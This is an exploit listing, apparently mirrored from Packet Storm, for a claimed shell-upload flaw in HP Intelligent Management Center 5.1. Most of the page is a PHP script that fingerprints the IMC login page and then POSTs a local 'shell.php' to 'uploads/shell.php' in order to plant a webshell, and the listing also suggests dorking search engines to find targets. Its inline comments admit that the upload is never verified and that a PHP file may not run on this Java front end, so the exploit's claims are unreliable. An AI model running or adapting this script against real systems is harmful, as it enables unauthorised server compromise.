## https://sploitus.com/exploit?id=PACKETSTORM:189586
=============================================================================================================================================
    | # Title     : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 54 (the `$ip` assignment under "// Example usage" at the end of the script)
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Fingerprint check: does the page at "$target/login.jsf" identify itself
     * as HP Intelligent Management Center?
     *
     * The only evidence used is the literal product name in the response body;
     * no version is read, so a match says nothing about whether the host is
     * running an affected or a patched release.
     *
     * Detection note: this produces one unauthenticated GET for /login.jsf,
     * which upload_file() follows with a multipart POST from the same client.
     *
     * @param string $target Base URL (scheme, host, port and context path).
     * @return bool True when the page was fetched and contains the product
     *              name; false on any fetch failure or when the name is absent.
     */
    function is_imc($target) {
        // "@" hides the warning a failed fetch would emit; failure is reported
        // solely through the false return value.
        $loginPage = @file_get_contents($target . "/login.jsf");
        if ($loginPage === false) {
            return false;
        }

        return strpos($loginPage, "HP Intelligent Management Center") !== false;
    }
    
    /**
     * Send a local file as a multipart/form-data POST to a path below the
     * given base URI, after confirming the host fingerprints as HP IMC.
     *
     * What the code shows, and what it does not:
     *  - The POST is addressed to "$target_uri/$upload_path" itself; no
     *    upload handler, session or credential is involved in the request.
     *  - "Success" means only that the HTTP request did not fail. Nothing
     *    checks that the file was stored or can be retrieved afterwards.
     *  - NOTE(review): login.jsf suggests a Java (JSF) front end; this page
     *    does not show that a stored .php file would be interpreted there.
     *
     * Detection notes for defenders:
     *  - Plain-HTTP multipart POST carrying a single part named "file" with
     *    Content-Type application/octet-stream.
     *  - The boundary is "----WebKitFormBoundary" followed by 32 hex digits
     *    (an MD5 of the clock); genuine WebKit/Blink boundaries normally
     *    carry a shorter alphanumeric suffix.
     *  - No User-Agent option is set in the stream context, so the request
     *    carries one only if php.ini's user_agent is configured.
     *  - Mitigation: restrict the management interface to administrative
     *    networks and apply the vendor guidance linked in the page header.
     *
     * @param string     $ip          Host name or address.
     * @param int|string $port        TCP port of the web interface.
     * @param string     $target_uri  Context path, e.g. "/imc".
     * @param string     $upload_path Path appended to $target_uri for the POST.
     * @param string     $local_file  Local file whose bytes are sent.
     * @return void Progress and outcome are echoed to standard output.
     */
    function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
        $baseUrl = "http://$ip:$port$target_uri";

        // Refuse to continue unless the login page names the product.
        if (!is_imc($baseUrl)) {
            echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
            return;
        }

        $payload = file_get_contents($local_file);
        if ($payload === false) {
            echo "Failed to read local file: $local_file\n";
            return;
        }

        // Boundary mimics a browser prefix; the suffix is derived from the clock.
        $delimiter = "----WebKitFormBoundary" . md5(time());
        $crlf = "\r\n";

        // One part named "file", then the closing delimiter; the trailing
        // empty element yields the final CRLF.
        $body = implode($crlf, [
            "--$delimiter",
            "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"",
            "Content-Type: application/octet-stream",
            "",
            $payload,
            "--$delimiter--",
            "",
        ]);

        $request = [
            "http" => [
                "method" => "POST",
                "header" => "Content-Type: multipart/form-data; boundary=$delimiter\r\n",
                "content" => $body
            ]
        ];

        $destination = "$baseUrl/$upload_path";
        echo "$ip:$port - Uploading file...\n";

        // "@" hides the transport warning; a false return is the only failure signal.
        $reply = @file_get_contents($destination, false, stream_context_create($request));

        // Any non-failing HTTP exchange is reported as success; storage of
        // the file is never verified.
        echo $reply !== false
            ? "$ip:$port - File uploaded successfully to $destination\n"
            : "$ip:$port - File upload failed\n";
    }
    
    // Example usage
    // Every value below is a placeholder from the published PoC: an RFC 1918
    // address, an alternate HTTP port and a context path.
    $ip          = '192.168.1.1';
    $port        = 8080;
    $target_uri  = '/imc';
    // Path the POST is addressed to, relative to $target_uri (adjust as needed).
    $upload_path = 'uploads/shell.php';
    // Local file whose bytes are sent as the multipart "file" part.
    $local_file  = 'shell.php';

    upload_file($ip, $port, $target_uri, $upload_path, $local_file);
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================